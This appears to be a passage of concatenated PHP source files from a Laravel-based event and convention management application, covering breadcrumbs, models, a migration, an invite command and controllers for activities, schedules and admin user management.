$breadcrumbs->parent('admin.venue.index');
$breadcrumbs->push($venue->name, action('AdminVenuesController@show', $venue->id));
});
Breadcrumbs::register('admin.venue.edit', function($breadcrumbs, $venue)
{
$breadcrumbs->parent('admin.venue.show', $venue);
$breadcrumbs->push(Lang::get('admin.edit'), action('AdminVenuesController@edit'));
});
/**
* Rooms
*/
Breadcrumbs::register('admin.room.index', function($breadcrumbs)
{
$breadcrumbs->parent('admin.home');
$breadcrumbs->push(Lang::get('labels.room'), action('AdminRoomsController@index'));
});
Breadcrumbs::register('admin.room.create', function($breadcrumbs)
{
$breadcrumbs->parent('admin.room.index');
$breadcrumbs->push(Lang::get('admin.create'), action('AdminRoomsController@create'));
});
Breadcrumbs::register('admin.room.show', function($breadcrumbs, $room) {
$breadcrumbs->parent('admin.room.index');
$breadcrumbs->push($room->name, action('AdminRoomsController@show', $room->id));
});
Breadcrumbs::register('admin.room.edit', function($breadcrumbs, $room)
{
$breadcrumbs->parent('admin.room.show', $room);
$breadcrumbs->push(Lang::get('admin.edit'), action('AdminRoomsController@edit'));
});
/**
* Users
*/
Breadcrumbs::register('admin.user.index', function($breadcrumbs)
{
$breadcrumbs->parent('admin.home');
$breadcrumbs->push(Lang::get('labels.users'), action('AdminUsersController@index'));
});
Breadcrumbs::register('admin.user.create', function($breadcrumbs)
{
$breadcrumbs->parent('admin.user.index');
$breadcrumbs->push(Lang::get('admin.create'), action('AdminUsersController@create'));
});
Breadcrumbs::register('admin.user.import', function($breadcrumbs)
{
$breadcrumbs->parent('admin.user.index');
$breadcrumbs->push(Lang::get('admin.import'), action('AdminUsersController@create'));
});
Breadcrumbs::register('admin.user.show', function($breadcrumbs, $user) {
$breadcrumbs->parent('admin.user.index');
$breadcrumbs->push($user->name, action('AdminUsersController@show', $user->id));
});
Breadcrumbs::register('admin.user.edit', function($breadcrumbs, $user)
{
$breadcrumbs->parent('admin.user.show', $user);
$breadcrumbs->push(Lang::get('admin.edit'), action('AdminUsersController@edit'));
});
/**
* Profile Fields
*/
Breadcrumbs::register('admin.field.index', function($breadcrumbs)
{
$breadcrumbs->parent('admin.home');
$breadcrumbs->push(Lang::get('labels.fields'), action('AdminProfileFieldsController@index'));
});
Breadcrumbs::register('admin.field.create', function($breadcrumbs)
{
$breadcrumbs->parent('admin.field.index');
$breadcrumbs->push(Lang::get('admin.create'), action('AdminProfileFieldsController@create'));
});
Breadcrumbs::register('admin.field.show', function($breadcrumbs, $profileField) {
$breadcrumbs->parent('admin.field.index');
$breadcrumbs->push($profileField->name, action('AdminProfileFieldsController@show', $profileField->id));
});
Breadcrumbs::register('admin.field.edit', function($breadcrumbs, $profileField)
{
$breadcrumbs->parent('admin.field.show', $profileField);
$breadcrumbs->push(Lang::get('admin.edit'), action('AdminProfileFieldsController@edit'));
});
/**
* Activities
*/
Breadcrumbs::register('admin.activity.index', function($breadcrumbs)
{
$breadcrumbs->parent('admin.home');
$breadcrumbs->push(Lang::get('labels.activity'), action('AdminActivitiesController@index'));
});
Breadcrumbs::register('admin.activity.create', function($breadcrumbs)
{
$breadcrumbs->parent('admin.activity.index');
$breadcrumbs->push(Lang::get('admin.create'), action('AdminActivitiesController@create'));
});
Breadcrumbs::register('admin.activity.show', function($breadcrumbs, $activity) {
$breadcrumbs->parent('admin.activity.index');
$breadcrumbs->push($activity->name, action('AdminActivitiesController@show', $activity->id));
});
Breadcrumbs::register('admin.activity.edit', function($breadcrumbs, $activity)
{
$breadcrumbs->parent('admin.activity.show', $activity);
$breadcrumbs->push(Lang::get('admin.edit'), action('AdminActivitiesController@edit'));
});
/**
* Activity Categories
*/
Breadcrumbs::register('admin.activityCategory.index', function($breadcrumbs)
{
$breadcrumbs->parent('admin.home');
$breadcrumbs->push(Lang::get('labels.activity_categories'), action('AdminActivityCategoriesController@index'));
});
Breadcrumbs::register('admin.activityCategory.create', function($breadcrumbs)
{
$breadcrumbs->parent('admin.activityCategory.index');
$breadcrumbs->push(Lang::get('admin.create'), action('AdminActivityCategoriesController@create'));
});
Breadcrumbs::register('admin.activityCategory.show', function($breadcrumbs, $profileField) {
$breadcrumbs->parent('admin.activityCategory.index');
$breadcrumbs->push($profileField->name, action('AdminActivityCategoriesController@show', $profileField->id));
});
Breadcrumbs::register('admin.activityCategory.edit', function($breadcrumbs, $profileField)
{
$breadcrumbs->parent('admin.activityCategory.show', $profileField);
$breadcrumbs->push(Lang::get('admin.edit'), action('AdminActivityCategoriesController@edit'));
});
<file_sep><?php
class ActivityCategory extends BaseModel {
protected $guarded = array();
public static $rules = array(
'name' => 'required',
'name_translation' => 'required',
'color' => 'required',
'text_color' => 'required'
);
public function activities()
{
return $this->hasMany('Activity');
}
public function rgbaColor($opacity = 1)
{
$color = $this->color;
$default = 'rgb(0,0,0)';
//Return default if no color provided
if (empty($color)) {
return $default;
}
//Sanitize $color if "#" is provided
if ($color[0] == '#' ) {
$color = substr( $color, 1 );
}
//Check if color has 6 or 3 characters and get values
if (strlen($color) == 6) {
$hex = array( $color[0] . $color[1], $color[2] . $color[3], $color[4] . $color[5] );
} elseif ( strlen( $color ) == 3 ) {
$hex = array( $color[0] . $color[0], $color[1] . $color[1], $color[2] . $color[2] );
} else {
return $default;
}
//Convert hexadec to rgb
$rgb = array_map('hexdec', $hex);
//Check if opacity is set(rgba or rgb)
if($opacity){
if(abs($opacity) > 1)
$opacity = 1.0;
$output = 'rgba('.implode(",",$rgb).','.$opacity.')';
} else {
$output = 'rgb('.implode(",",$rgb).')';
}
//Return rgb(a) color string
return $output;
}
public function textColor()
{
// returns brightness value from 0 to 255
// strip off any leading #
$hex = str_replace('#', '', $this->color);
$c_r = hexdec(substr($hex, 0, 2));
$c_g = hexdec(substr($hex, 2, 2));
$c_b = hexdec(substr($hex, 4, 2));
$contrast = (($c_r * 299) + ($c_g * 587) + ($c_b * 114)) / 1000;
return $contrast > 130 ? 'black' : 'white';
}
}
<file_sep><?php
class ProfileData extends BaseModel
{
protected $table = 'profile_data';
protected $guarded = array();
public static $rules = array();
public function user()
{
return $this->belongsTo('User');
}
public function field()
{
return $this->belongsTo('ProfileField');
}
}
<file_sep><?php
class AdminActivityCategoriesController extends BaseController {
/**
* ActivityCategory Repository
*
* @var ActivityCategory
*/
protected $activityCategory;
public function __construct(ActivityCategory $activityCategory)
{
$this->ActivityCategory = $activityCategory;
$this->events = array();
foreach(ConEvent::all() as $event) {
$this->events[$event->id] = $event->name;
}
$this->users = array();
foreach(User::all() as $user) {
$this->users[$user['attributes']['id']] = $user['attributes']['name'] ? $user['attributes']['name'] : $user['attributes']['email'];
}
}
/**
* Display a listing of the resource.
*
* @return Response
*/
public function index()
{
$activityCategories = ActivityCategory::all();
return View::make('admin.activityCategories.index', compact('activityCategories'));
}
/**
* Show the form for creating a new resource.
*
* @return Response
*/
public function create()
{
$events = $this->events;
$users = $this->users;
return View::make('admin.activityCategories.create', compact('events', 'users'));
}
/**
* Store a newly created resource in storage.
*
* @return Response
*/
public function store()
{
// $input = Input::all();
$input = array_except(Input::all(), array('_method', '_token'));
$validation = Validator::make($input, ActivityCategory::$rules);
if ($validation->passes())
{
$activityCategory = ActivityCategory::create($input);
return Redirect::action('AdminActivityCategoriesController@index')
->with('success', Lang::get('messages.create_success', array('model' => ucfirst(Lang::get('labels.activity_category')))));
}
return Redirect::action('AdminActivityCategoriesController@create')
->withInput()
->withErrors($validation)
->with('error', Lang::get('messages.validation_error'));
}
/**
* Display the specified resource.
*
* @param int $id
* @return Response
*/
public function show($id)
{
$activityCategory = $this->ActivityCategory->findOrFail($id);
// dd($activityCategory->count());
return View::make('admin.activityCategories.show', compact('activityCategory'));
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return Response
*/
public function edit($id)
{
$activityCategory = $this->ActivityCategory->find($id);
if (is_null($activityCategory))
{
return Redirect::action('AdminActivityCategoriesController@index');
}
$users = $this->users;
$events = $this->events;
return View::make('admin.activityCategories.edit', compact('activityCategory', 'events', 'users'));
}
/**
* Update the specified resource in storage.
*
* @param int $id
* @return Response
*/
public function update($id)
{
$input = array_except(Input::all(), array('_method', '_token'));
$validation = Validator::make($input, ActivityCategory::$rules);
if ($validation->passes())
{
$activityCategory = ActivityCategory::find($id);
$activityCategory->update($input);
// if (Input::has('hosts'))
// {
// $hosts = array();
// foreach (Input::get('hosts') as $host) {
// $hosts[$host] = array('host' => true);
// }
// $user->ActivityCategory->hosts()->sync($hosts);
// }
// if (Input::has('participants'))
// {
// $user->ActivityCategory->hosts()->sync(Input::get('participants'));
// }
return Redirect::action('AdminActivityCategoriesController@show', $id)
->with('success', Lang::get('messages.update_success', array('model' => ucfirst(Lang::get('labels.activity_category')))));
}
return Redirect::action('AdminActivityCategoriesController@edit', $id)
->withInput()
->withErrors($validation)
->with('message', Lang::get('messages.validation_error'));
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return Response
*/
public function destroy($id)
{
$this->ActivityCategory->find($id)->delete();
return Redirect::action('AdminActivityCategoriesController@index');
}
}
<file_sep><?php
class BaseModel extends Eloquent {
/**
* Formats a database timestamp with Carbon
* @param string $value Date fetched from database
* @param string $format Date format in PHP date syntax
* @return Carbon Carbon date object
*/
protected function getTimestampAs($value, $format = 'Y-m-d H:i')
{
return \Carbon\Carbon::createFromFormat('Y-m-d H:i:s', $value)->format($format);
}
static function toFlatArray($first = null, $value = 'name', $key = 'id')
{
$array = array();
if (isset($first))
{
$array[] = $first;
}
foreach (self::all() as $item)
{
$array[$item->$key] = $item->$value;
}
return $array;
}
}
<file_sep><?php
return array
(
'signup_full' => 'Activity has no places left for sign-up.',
'capacity' => 'This activity can take :capacity participants.',
'signup_capacity' => ':left of :capacity spots for sign-up left.',
'signup_closed' => 'Sign-up for this acitivity is closed.',
'signup_open' => 'Sign-up for this acitivity is open.',
);
<file_sep><?php
use Illuminate\Database\Migrations\Migration;
use Illuminate\Database\Schema\Blueprint;
class CreateActivityCategoriesTable extends Migration {
/**
* Run the migrations.
*
* @return void
*/
public function up()
{
Schema::create('activity_categories', function(Blueprint $table) {
$table->increments('id');
$table->string('name');
$table->string('name_translation');
$table->string('color')->default('#eee');
$table->string('text_color')->default('#000');
$table->text('description')->nullable();
$table->string('description_translation')->nullable();
$table->timestamps();
});
}
/**
* Reverse the migrations.
*
* @return void
*/
public function down()
{
Schema::drop('activity_categories');
}
}
<file_sep><?php
class ActivitiesController extends BaseController
{
public function __construct()
{
$this->beforeFilter('auth', array('only' => array('getSignUp')));
$this->beforeFilter('auth|admin', array('only' => array('getParticipants')));
parent::__construct();
}
/**
* Display the specified resource or listing.
*
* @param int $id
* @return Response
*/
public function getIndex($id = null)
{
$activities = Activity::all();
$page_title = Lang::get('labels.activities');
return View::make('activities.index', compact('activities', 'page_title'));
}
public function getShow($id)
{
try
{
$activity = Activity::findOrFail($id);
$page_title = $activity->name;
return View::make('activities.show', compact('activity', 'page_title'));
}
catch (Exception $e)
{
return Redirect::action('HomeController@index')->with('error', $e->getMessage());
}
}
public function getSignUp($activity, $action)
{
try
{
$user = Sentry::getUser();
$activity = Activity::find($activity);
if (!$activity->open)
{
$return = Redirect::back()->with('error', Lang::get('messages.error_activity_not_open'));
}
else
{
if ($action === 'join')
{
if ($activity->hasPlacesLeft())
{
$user->activities()->attach($activity->id);
$return = Redirect::back()
->with('success', Lang::get('messages.success_activity_joined', array('activity' => $activity->name)) );
}
else
{
$return = Redirect::back()
->with('error', Lang::get('messages.error_activity_full', array('activity' => $activity->name)) );
}
}
else
{
$user->activities()->detach($activity->id);
$return = Redirect::back()
->with('success', Lang::get('messages.success_activity_left', array('activity' => $activity->name)));
}
}
}
catch(Exception $e)
{
return Redirect::back()
->with('error', $e->getMessage());
}
return $return;
}
public function getParticipants($id)
{
try
{
$activity = Activity::findOrFail($id);
$page_title = $activity->name;
$participants = array();
return View::make('activities.participants', compact('activity', 'page_title'));
}
catch (Exception $e)
{
return Redirect::action('HomeController@index')->with('error', $e->getMessage());
}
}
}
<file_sep><?php
use Illuminate\Console\Command;
use Symfony\Component\Console\Input\InputOption;
use Symfony\Component\Console\Input\InputArgument;
class userInvite extends Command {
/**
* The console command name.
*
* @var string
*/
protected $name = 'user:invite';
/**
* The console command description.
*
* @var string
*/
protected $description = 'Invite user';
/**
* Create a new command instance.
*
* @return void
*/
public function __construct()
{
parent::__construct();
}
/**
* Execute the console command.
*
* @return mixed
*/
public function fire()
{
try
{
$email = $this->argument('email');
$user = Sentry::findUserByLogin($email);
$email = $user->email;
$name = $user->name;
$password = <PASSWORD>(8);
$resetCode = $user->getResetPasswordCode();
if ($user->checkResetPasswordCode($resetCode))
{
if ($user->attemptResetPassword($resetCode, $password))
{
Mail::send('emails.auth.invite', compact('email', 'name', 'password'), function($message) use ($email, $name)
{
$message->to($email, $name)->subject(Lang::get('emails.subject.invite', array('app' => Lang::get('app.name'))));
});
$user->invited = true;
$user->save();
$this->info('User was successfully invited!');
}
else
{
$this->error('Could not invite user!');
}
}
else
{
$this->error('Could not invite user!');
}
}
catch (Cartalyst\Sentry\Users\UserNotFoundException $e)
{
$this->error('User does not exists!');
}
}
/**
* Get the console command arguments.
*
* @return array
*/
protected function getArguments()
{
return array(
array('email', InputArgument::REQUIRED, 'User email'),
);
}
/**
* Get the console command options.
*
* @return array
*/
protected function getOptions()
{
return array();
}
}
<file_sep><?php
class Country extends BaseModel {
protected $guarded = array();
public static $rules = array();
static function formList()
{
$countries = array('Select Country');
foreach (Country::all() as $country)
{
$countries[$country->id] = $country->name;
}
return $countries;
}
public function users()
{
return $this->hasMany('User');
}
public function getUserCountAttribute($value)
{
$value = $this->users->count();
return $value;
}
}
<file_sep><?php
class ProfileField extends BaseModel {
protected $guarded = array();
public static $rules = array(
'name' => 'required',
'sort_order' => 'required|integer|min:0',
'relation_table' => 'required_if:type,relation'
);
public function values()
{
return $this->hasMany('ProfileValue');
}
public function events()
{
return $this->belongsToMany('ConEvent');
}
public function getOptionsArrayAttribute($value)
{
if ($this->options)
{
$value = array('');
foreach(json_decode($this->options) as $option)
{
$value[$option] = $option;
}
}
return $value;
}
public function getFormNameAttribute($value)
{
$value = sprintf('field_%s_%s', $this->type, $this->id);
return $value;
}
public function getFormVisibilityAttribute($value)
{
$value = sprintf('field_%s_%s_visibility', $this->type, $this->id);
return $value;
}
}
<file_sep><?php
class ConEvent extends BaseModel
{
protected $guarded = array();
public static $rules = array(
'name' => 'required',
'description' => 'required'
);
public function category()
{
return $this->belongsTo('ConEventCategory');
}
public function activities()
{
return $this->hasMany('Activity');
}
public function venue()
{
return $this->belongsTo('Venue');
}
public function participants()
{
return $this->belongsToMany('User');
}
public function getStartsAtAttribute($value)
{
return \Carbon\Carbon::createFromFormat('Y-m-d H:i:s', $value);
}
public function getEndsAtAttribute($value)
{
return \Carbon\Carbon::createFromFormat('Y-m-d H:i:s', $value);
}
public function profileFields()
{
return $this->belongsToMany('ProfileField');
}
}
<file_sep><?php
class VenuesController extends BaseController
{
/**
* Display the specified resource or listing.
*
* @param int $id
* @return Response
*/
public function getIndex($id = null)
{
$venues = Venue::all();
return View::make('venues.index', compact('venues'));
}
public function getShow($id)
{
try
{
$venue = Venue::findOrFail($id);
}
catch (Exception $e)
{
return Redirect::action('VenuesController@getIndex')->with('error', Lang::get('venues.error_not_found'));
}
return View::make('venues.show', compact('venue'));
}
}
<file_sep><?php
class ConEventsController extends BaseController
{
public function __construct()
{
$this->beforeFilter('auth', array('except' => array('getIndex', 'getShow', 'getSchedule')));
parent::__construct();
}
/**
* Display the specified resource or listing.
*
* @param int $id
* @return Response
*/
public function getIndex($id = null)
{
$page = Input::has('page') ? Input::get('page') : '1';
$sort = Input::has('sort') ? Input::get('sort') : 'starts_at';
$order = Input::has('order') ? Input::get('order') : 'desc';
$page_title = Lang::get('labels.events');
$events = ConEvent::orderBy($sort, $order)->paginate(15);
return View::make('events.index', compact('events', 'sort', 'order', 'page', 'page_title'));
}
public function getShow($id)
{
try
{
$page = Input::has('page') ? Input::get('page') : '1';
$sort = Input::has('sort') ? Input::get('sort') : 'name';
$order = Input::has('order') ? Input::get('order') : 'asc';
$event = ConEvent::findOrFail($id);
$users = $event->participants()->orderBy($sort, $order)->paginate(15);
$page_title = $event->name;
$day = false;
$time = false;
return View::make('events.show', compact('event', 'users', 'sort', 'order', 'page', 'day', 'time', 'page_title'));
}
catch (Exception $e)
{
return Redirect::back()->with('error', $e->getMessage());
}
}
public function getMyActivities($id)
{
try
{
$event = ConEvent::findOrFail($id);
$activities = array();
$user = Sentry::getUser();
foreach ($event->activities()->orderBy('starts_at', 'asc')->get() as $activity)
{
if ($activity->participants()->where('user_id', '=', $user->id)->count())
{
$activities[] = $activity;
}
}
$page_title = $event->name;
$day = false;
$time = false;
return View::make('events.my-activities', compact('event', 'activities', 'day', 'time', 'page_title'));
}
catch (Exception $e)
{
return Redirect::back()->with('error', $e->getMessage());
}
}
public function getParticipants($id)
{
try
{
$page = Input::has('page') ? Input::get('page') : '1';
$sort = Input::has('sort') ? Input::get('sort') : 'name';
$order = Input::has('order') ? Input::get('order') : 'asc';
$event = ConEvent::findOrFail($id);
$users = $event->participants()->orderBy($sort, $order)->paginate(20);
$page_title = $event->name;
$day = false;
$time = false;
$countries = array();
foreach ($event->participants as $participant)
{
if (!in_array($participant->country_id, $countries))
{
$countries[] = $participant->country_id;
}
}
$countries = sizeof($countries);
return View::make('events.participants', compact('event', 'users', 'sort', 'order', 'page', 'day', 'time','countries', 'page_title'));
}
catch (Exception $e)
{
return Redirect::back()->with('error', $e->getMessage());
}
}
public function getSignUp($event, $action)
{
try {
$event = ConEvent::find($event);
if (!$event->open) {
$return = Redirect::back()->with('error', Lang::get('events.error_not_open'));
}
else {
if ($action === 'join') {
$this->user->events()->attach($event->id);
$return = Redirect::back()
->with('success', Lang::get('events.success_joined', array('event' => $event->name)) );
}
else {
$this->user->events()->detach($event->id);
$return = Redirect::back()
->with('success', Lang::get('events.success_left', array('event' => $event->name)));
}
}
}
catch(Exception $e) {
return Redirect::back()
->with('error', 'Event sign up failed!');
}
return $return;
}
public function getSchedule($eventId)
{
try
{
$event = ConEvent::find($eventId);
$user = Sentry::check() ? Sentry::getUser() : false;
$rooms = $event->venue->rooms()->orderBy('id')->get();
$rooms2 = array();
$roomRows = array();
foreach($rooms as $room)
{
if (Activity::where('room_id', '=', $room->id)->count())
{
$rooms2[] = $room;
$roomRows[$room->id] = 1;
}
}
$rooms = $rooms2;
$days = array();
$length = $event->starts_at->diffInDays($event->ends_at)+1;
for ($i = 0; $i <= $length; $i++)
{
$date = $event->starts_at->copy()->addDays($i);
$date->hour = 0;
$date->minute = 0;
$date->second = 0;
$activities = Activity::getForDate($date, $event);
$table = array();
$firstTime = $event->ends_at->copy()->addDay();
$firstTime->hour = 0;
$firstTime->minute = 0;
$firstTime->second = 0;
$lastTime = $event->starts_at->copy();
$lastTime->hour = 0;
$lastTime->minute = 0;
$lastTime->second = 0;
foreach ($activities as $activity)
{
if ($activity->starts_at < $firstTime)
{
$firstTime = $activity->starts_at;
}
if ($activity->ends_at > $lastTime)
{
$lastTime = $activity->ends_at;
}
}
$currentTime = $firstTime->copy();
$rowspans = array();
$row = array('<th> </th>');
foreach ($rooms as $room)
{
$row[] = sprintf('<th style="width:%d%%">%s</th>', (1/sizeof($rooms))*100, $room->name);
$rowspans[$room->id] = 1;
}
$table[] = $row;
$categories = array();
while ($currentTime <= $lastTime)
{
$row = array();
$row[0] = sprintf('<td>%s</td>', $currentTime->format('H:i'));
if ($activity = Activity::where('con_event_id', '=', $event->id)->where('all_rooms', '=', true)->where('starts_at', '=', $currentTime->format('Y-m-d H:i:s'))->first())
{
$rowspan = ceil($activity->getDuration(false)/60);
foreach ($rooms as $room)
{
$rowspans[$room->id] = $rowspan;
}
if ($activity->category && !in_array($activity->category, $categories))
{
$categories[] = $activity->category;
}
$cell = "";
if ($activity->category)
{
// $cell .= "<span class=\"glyphicon glyphicon-tag\" title=\"{$activity->category->name}\"></span> ";
}
if ($user && $activity->participants()->where('user_id', '=', $user->id)->count())
{
$name = sprintf('<span class="glyphicon glyphicon-asterisk" title="%s"></span> %s', Lang::get('messages.signed_up'), $activity->name);
}
else {
$name = $activity->name;
}
$cell .= sprintf('<a href="%s">%s</div>', action('ActivitiesController@getShow', $activity->id), $name);
$cell .= sprintf('<div class="duration">%s</div>', $activity->getDuration());
$row[] = sprintf('<td rowspan="%d" colspan="%d" class="active %s" style="background-color:%s;">%s</td>',
$rowspan,
sizeof($rooms),
$activity->category->textColor(),
$activity->category->color,
$cell
);
}
else
{
foreach ($rooms as $room)
{
$rowspan = 1;
$class = '';
if ($activity = Activity::where('room_id', '=', $room->id)->where('starts_at', '=', $currentTime->format('Y-m-d H:i:s'))->first())
{
$rowspan = ceil($activity->getDuration(false)/60);
$rowspans[$room->id] = $rowspan;
if ($activity->category && !in_array($activity->category, $categories))
{
$categories[] = $activity->category;
}
$cell = "";
if ($activity->category)
{
// $cell .= "<span class=\"glyphicon glyphicon-tag\" title=\"{$activity->category->name}\"></span> ";
}
if ($user && $activity->participants()->where('user_id', '=', $user->id)->count())
{
$name = sprintf('<span class="glyphicon glyphicon-asterisk" title="%s"></span> %s', Lang::get('messages.signed_up'), $activity->name);
}
else {
$name = $activity->name;
}
$cell .= sprintf('<a href="%s">%s</div>', action('ActivitiesController@getShow', $activity->id), $name);
$cell .= sprintf('<div class="duration">%s</div>', $activity->getDuration());
$row[] = sprintf('<td rowspan="%d" class="active %s" style="background-color:%s;">%s</td>',
$rowspan,
$activity->category->textColor(),
$activity->category->color,
$cell
);
}
else
{
$cell = $room->id . ' ' . $rowspans[$room->id];
if ($rowspans[$room->id] > 1)
{
$rowspans[$room->id] -= 1;
}
else
{
$row[] = sprintf('<td rowspan="%d"> </td>', $rowspan);
}
}
}
}
$table[] = $row;
$currentTime->addHour();
}
$days[] = array(
'date' => $date,
'activities' => $activities,
'firstTime' => $firstTime,
'lastTime' => $lastTime,
'table' => $table,
'categories' =>$categories
);
}
$page_title = $event->name;
return View::make('events.schedule', compact('event', 'rooms', 'days', 'roomRows', 'page_title'));
}
catch(Exception $e)
{
// return Redirect::back()
// ->with('error', $e->getMessage());
}
}
}
<file_sep><?php
class AdminUsersController extends AdminBaseController {
public $restful = true;
/**
* User Repository
*
* @var User
*/
protected $user;
public function __construct(User $user)
{
$this->title ='';
$this->user = $user;
$this->user->setHasher(new Cartalyst\Sentry\Hashing\NativeHasher);
// Set up checker
$this->checkColumn = 'email';
$this->checkModel = 'User';
$this->checkMessage = 'messages.check_user';
}
/**
* Invites all users
*
* @return Response
*/
public function inviteAll()
{
foreach (User::all() as $user) {
if (!$user->invited)
{
try
{
$email = $user->email;
$name = $user->name;
$password = <PASSWORD>(8);
$resetCode = $user->getResetPasswordCode();
if ($user->checkResetPasswordCode($resetCode))
{
if ($user->attemptResetPassword($resetCode, $password))
{
Mail::queue('emails.auth.invite', compact('email', 'name', 'password'), function($message) use ($email, $name)
{
$message->to($email, $name)->subject(Lang::get('emails.subject.invite', array('app' => Lang::get('app.name'))));
});
$user->invited = true;
$user->save();
}
}
}
catch (Cartalyst\Sentry\Users\UserNotFoundException $e)
{}
}
}
return Redirect::action('AdminUsersController@index')
->with('success', 'messages.invite_success');
}
/**
* Sends invitation email to the specified user.
*
* @return Response
*/
public function invite($id)
{
try
{
$user = Sentry::findUserById($id);
$email = $user->email;
$name = $user->name;
$password = <PASSWORD>(8);
$resetCode = $user->getResetPasswordCode();
if ($user->checkResetPasswordCode($resetCode))
{
if ($user->attemptResetPassword($resetCode, $password))
{
Mail::send('emails.auth.invite', compact('email', 'name', 'password'), function($message) use ($email, $name)
{
$message->to($email, $name)->subject(Lang::get('emails.subject.invite', array('app' => Lang::get('app.name'))));
});
$user->invited = true;
$user->save();
return Redirect::action('AdminUsersController@show', $id)
->with('success', Lang::get('messages.invite_success'));
}
else
{
return Redirect::action('AdminUsersController@show', $id)
->with('success', Lang::get('messages.invite_error'));
}
}
else
{
return Redirect::action('AdminUsersController@show', $id)
->with('success', Lang::get('messages.invite_error'));
}
}
catch (Cartalyst\Sentry\Users\UserNotFoundException $e)
{
return Redirect::action('AdminUsersController@index')
->with('error', Lang::get('messages.user_not_found'));
}
}
/**
* Displays the data import form.
*
* @return Response
*/
public function getImportData()
{
return View::make('admin.users.import_data');
}
/**
* Handles the user import form.
*
* @return Response
*/
public function postImportData()
{
if (Input::hasFile('file'))
{
$event = ConEvent::find(2);
$file = file(Input::file('file')->getRealPath());
foreach($file as $line)
{
// $csv = str_getcsv($line, ';');
$data = explode(';', $line);
$name = trim($data[0]);
$email = trim($data[1]);
$country = trim($data[2]);
$food = trim($data[3]);
$allergy = trim($data[4]);
$room = trim($data[5]);
$with = trim($data[6]);
$awig = trim($data[7]);
try
{
$user = User::where('email', 'like', $email)->firstOrFail();
try
{
$country = Country::where('name', 'like', $country)->firstOrFail();
}
catch (Exception $e)
{
$country = null;
}
$user->country_id = $country->id;
$user->save();
// echo "{$user->id} {$country->id} $food $awig\n";
if ($awig === 'Yes')
{
$user->events()->sync(array('1','2'));
}
// Food
$pdata = array(
'user_id' => $user->id,
'profile_field_id' => '1',
'value' => $food,
'visibility' => 'private'
);
if (!sizeof($user->profileData))
{
$profileData = ProfileData::create($pdata);
}
else {
try {
$field = $user->profileData()->where('profile_field_id','=', $pdata['profile_field_id'])->firstOrFail();
$field->update($pdata);
}
catch(Illuminate\Database\Eloquent\ModelNotFoundException $e)
{
$profileData = ProfileData::create($pdata);
}
}
// Allergy
try
{
$pdata = array(
'user_id' => $user->id,
'profile_field_id' => '2',
'value' => $allergy,
'visibility' => 'private'
);
if (!sizeof($user->profileData))
{
$profileData = ProfileData::create($pdata);
}
else {
try {
$field = $user->profileData()->where('profile_field_id','=', $pdata['profile_field_id'])->firstOrFail();
$field->update($pdata);
}
catch(Illuminate\Database\Eloquent\ModelNotFoundException $e)
{
$profileData = ProfileData::create($pdata);
}
}
}
catch (Exception $e)
{
}
// room
$pdata = array(
'user_id' => $user->id,
'profile_field_id' => '6',
'value' => $room,
'visibility' => 'private'
);
if (!sizeof($user->profileData))
{
$profileData = ProfileData::create($pdata);
}
else {
try {
$field = $user->profileData()->where('profile_field_id','=', $pdata['profile_field_id'])->firstOrFail();
$field->update($pdata);
}
catch(Illuminate\Database\Eloquent\ModelNotFoundException $e)
{
$profileData = ProfileData::create($pdata);
}
}
// with
$pdata = array(
'user_id' => $user->id,
'profile_field_id' => '5',
'value' => $with,
'visibility' => 'private'
);
if (!sizeof($user->profileData))
{
$profileData = ProfileData::create($pdata);
}
else {
try {
$field = $user->profileData()->where('profile_field_id','=', $pdata['profile_field_id'])->firstOrFail();
$field->update($pdata);
}
catch(Illuminate\Database\Eloquent\ModelNotFoundException $e)
{
$profileData = ProfileData::create($pdata);
}
}
}
catch (Exception $e)
{
}
}
}
return Redirect::action('AdminUsersController@index')
->with('success', Lang::get('messages.import_data_success'));
}
/**
* Displays the user export form.
*
* @return Response
*/
public function getExport()
{
return View::make('admin.users.export');
}
/**
* Displays the user import form.
*
* @return Response
*/
public function getImport()
{
return View::make('admin.users.import');
}
/**
* Handles the user import form.
*
* @return Response
*/
public function postImport()
{
$user = $this->user;
if (Input::hasFile('file'))
{
$file = file(Input::file('file')->getRealPath());
foreach($file as $line)
{
if (strlen($line) && strpos($line, "\t") !== false)
{
$data = explode("\t", $line);
$input = array('email' => trim($data[1]), 'password' => md5(rand()), 'name' => trim($data[0]));
if (!(boolean) User::where('email', '=', $input['email'])->count())
{
$user = \Sentry::getUserProvider()->create($input);
$activationCode = $user->getActivationCode();
$user->attemptActivation($activationCode);
if (Input::has('events'))
{
$user->events()->sync(Input::get('events'));
}
}
}
}
return Redirect::action('AdminUsersController@index');
}
return Redirect::action('AdminUsersController@getImport')
->withInput()
->with('message', Lang::get('messages.validation_error'));
}
/**
* Displays the user export form.
*
* @return Response
*/
public function getContact()
{
$users = User::all();
return View::make('admin.users.contact', compact('users'));
}
/**
* Display a listing of the resource.
*
* @return Response
*/
public function index()
{
$page = Input::has('page') ? Input::get('page') : '1';
$sort = Input::has('sort') ? Input::get('sort') : 'name';
$order = Input::has('order') ? Input::get('order') : 'asc';
$users = User::orderBy($sort, $order)->paginate(20);
return View::make('admin.users.index', compact('users', 'sort', 'order', 'page'));
}
/**
* Display a listing of the resource.
*
* @return Response
*/
public function postSearch()
{
try
{
$term = Input::has('term') ? Input::get('term') : '';
$users = User::where('name', 'like', "%$term%")->get();
return View::make('admin.users.search_result', compact('users'));
}
catch (Exception $e)
{
return Redirect::back()->with('error', $e->getMessage());
}
}
/**
* Show the form for creating a new resource.
*
* @return Response
*/
public function create()
{
$countries = Country::formList();
$events = ConEvent::orderBy('starts_at', 'asc')->get();
return View::make('admin.users.create', compact('countries', 'events'));
}
/**
* Store a newly created resource in storage.
*
* @return Response
*/
public function store()
{
// $input = Input::all();
$input = array_except(Input::all(), array('_method', '_token', 'events', 'groups'));
$validation = Validator::make($input, User::$rules);
if ($validation->passes())
{
try
{
// Create the user
$user = Sentry::createUser(array(
'email' => trim($input['email']),
'password' => $input['<PASSWORD>'],
'activated' => true,
));
// $user = User::find($user->id);
$user->name = trim($input['name']);
$user->country_id = $input['country_id'];
$user->save();
if (Input::has('events'))
{
$user->events()->sync(Input::get('events'));
}
try
{
foreach (Cartalyst\Sentry\Groups\Eloquent\Group::all() as $group)
{
if (Input::has('groups') && in_array($group->getId(), Input::get('groups')))
{
$user->addGroup($group);
}
else
{
$user->removeGroup($group);
}
}
}
catch (Exception $e)
{
$return = Redirect::back()
->with('error', Lang::get('messages.not_found', array('model' => Lang::get('labels.group'))));
}
}
catch (Cartalyst\Sentry\Users\LoginRequiredException $e)
{
